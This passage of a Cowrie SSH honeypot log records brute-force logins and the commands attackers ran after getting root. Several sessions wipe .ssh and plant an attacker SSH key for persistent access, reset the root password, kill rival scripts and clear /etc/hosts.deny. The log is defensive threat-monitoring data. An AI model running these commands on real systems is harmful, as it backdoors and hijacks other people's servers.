es256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:25:29.753742Z","src_ip":"185.152.45.241","session":"e7b93d3dd30b"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe753","message":"login attempt [root/qwe753] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:25:30.309093Z","src_ip":"185.152.45.241","session":"e7b93d3dd30b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:25:30.489250Z","src_ip":"185.152.45.241","session":"e7b93d3dd30b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:25:30.490051Z","src_ip":"185.152.45.241","session":"e7b93d3dd30b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:25:30.491329Z","src_ip":"185.152.45.241","session":"e7b93d3dd30b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:25:30.538794Z","src_ip":"185.152.45.241","session":"e7b93d3dd30b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:25:30.677074Z","src_ip":"185.152.45.241","session":"e7b93d3dd30b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:25:30.677760Z","src_ip":"185.152.45.241","session":"e7b93d3dd30b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:25:30.729388Z","src_ip":"185.152.45.241","session":"e7b93d3dd30b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:25:30.730276Z","src_ip":"185.152.45.241","session":"e7b93d3dd30b"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11753,"dst_ip":"1.2.3.4","dst_port":22,"session":"08f0aaa3cbb6","protocol":"ssh","message":"New connection: 185.152.45.241:11753 (1.2.3.4:22) [session: 08f0aaa3cbb6]","sensor":"my-vps","timestamp":"2025-09-09T02:25:30.776043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:25:30.776750Z","src_ip":"185.152.45.241","session":"08f0aaa3cbb6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:25:30.823880Z","src_ip":"185.152.45.241","session":"08f0aaa3cbb6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:25:31.069791Z","src_ip":"185.152.45.241","session":"08f0aaa3cbb6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:25:32.114645Z","src_ip":"185.152.45.241","session":"08f0aaa3cbb6"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11752,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f369cef6cdb","protocol":"ssh","message":"New connection: 185.152.45.241:11752 (1.2.3.4:22) [session: 6f369cef6cdb]","sensor":"my-vps","timestamp":"2025-09-09T02:25:32.164927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:25:32.165628Z","src_ip":"185.152.45.241","session":"6f369cef6cdb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:25:32.208849Z","src_ip":"185.152.45.241","session":"6f369cef6cdb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:25:32.449414Z","src_ip":"185.152.45.241","session":"6f369cef6cdb"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:25:32.494153Z","src_ip":"185.152.45.241","session":"e7b93d3dd30b"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:25:32.510461Z","src_ip":"185.152.45.241","session":"6f369cef6cdb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54458,"dst_ip":"1.2.3.4","dst_port":22,"session":"33c8d9621dc3","protocol":"ssh","message":"New connection: 212.227.235.229:54458 (1.2.3.4:22) [session: 33c8d9621dc3]","sensor":"my-vps","timestamp":"2025-09-09T02:25:33.654518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:25:33.659559Z","src_ip":"212.227.235.229","session":"33c8d9621dc3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:25:33.902331Z","src_ip":"212.227.235.229","session":"33c8d9621dc3"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"Password1","message":"login attempt [jenkins/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:25:34.883140Z","src_ip":"212.227.235.229","session":"33c8d9621dc3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:25:36.133141Z","src_ip":"212.227.235.229","session":"33c8d9621dc3"}
{"eventid":"cowrie.session.connect","src_ip":"219.92.8.22","src_port":59358,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9ebd0783bed","protocol":"ssh","message":"New connection: 219.92.8.22:59358 (1.2.3.4:22) [session: f9ebd0783bed]","sensor":"my-vps","timestamp":"2025-09-09T02:26:09.990005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:26:09.990653Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:26:10.165387Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3e4","message":"login attempt [root/Q1w2e3e4] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:26:10.915290Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:11.335627Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:26:11.336280Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:26:11.337330Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:11.512319Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:11.883125Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:26:11.883915Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:26:12.062352Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:12.063385Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.connect","src_ip":"219.92.8.22","src_port":59368,"dst_ip":"1.2.3.4","dst_port":22,"session":"38f407200611","protocol":"ssh","message":"New connection: 219.92.8.22:59368 (1.2.3.4:22) [session: 38f407200611]","sensor":"my-vps","timestamp":"2025-09-09T02:26:12.241055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:26:12.241786Z","src_ip":"219.92.8.22","session":"38f407200611"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:26:12.419029Z","src_ip":"219.92.8.22","session":"38f407200611"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:26:13.163009Z","src_ip":"219.92.8.22","session":"38f407200611"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:14.340736Z","src_ip":"219.92.8.22","session":"38f407200611"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58684,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c12b0aa94a4","protocol":"ssh","message":"New connection: 212.227.235.229:58684 (1.2.3.4:22) [session: 6c12b0aa94a4]","sensor":"my-vps","timestamp":"2025-09-09T02:26:17.633649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:26:17.634479Z","src_ip":"212.227.235.229","session":"6c12b0aa94a4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:26:17.883886Z","src_ip":"212.227.235.229","session":"6c12b0aa94a4"}
{"eventid":"cowrie.login.failed","username":"minerstat","password":"Password1","message":"login attempt [minerstat/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:26:18.927303Z","src_ip":"212.227.235.229","session":"6c12b0aa94a4"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:20.182163Z","src_ip":"212.227.235.229","session":"6c12b0aa94a4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:22.612027Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T02:26:22.612734Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:22.789405Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:23.210877Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"echo \"root:S6GcRuLD3In5\"|chpasswd|bash","message":"CMD: echo \"root:S6GcRuLD3In5\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-09T02:26:23.211551Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/663837cf5ee7f1be5cf02ae2d0f50bda1a368c9a090c6806c009b9703c1b41a5","size":21,"shasum":"663837cf5ee7f1be5cf02ae2d0f50bda1a368c9a090c6806c009b9703c1b41a5","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/663837cf5ee7f1be5cf02ae2d0f50bda1a368c9a090c6806c009b9703c1b41a5 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:23.388648Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:23.797885Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-09T02:26:23.798705Z","src_ip":"219.92.8.22","session":"f9ebd0783bed"}
